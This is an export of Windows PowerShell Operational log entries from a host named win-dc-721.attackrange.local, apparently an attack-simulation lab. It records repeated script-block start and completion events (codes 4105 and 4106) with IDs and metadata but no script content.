TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470073
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470072
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470071
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470070
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470069
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470068
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470067
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470066
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470065
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470064
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470063
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470062
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470061
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470060
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470059
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470058
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470057
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470056
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470055
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470054
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470053
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470052
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470051
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470050
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470049
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470048
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470047
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470046
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470045
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470044
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470043
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470042
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470041
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470040
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470039
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470038
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470037
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470036
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470035
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470034
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470033
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470032
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470031
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470030
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470029
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470028
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470027
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470026
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470025
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470024
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470023
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470022
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470021
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470020
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470019
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
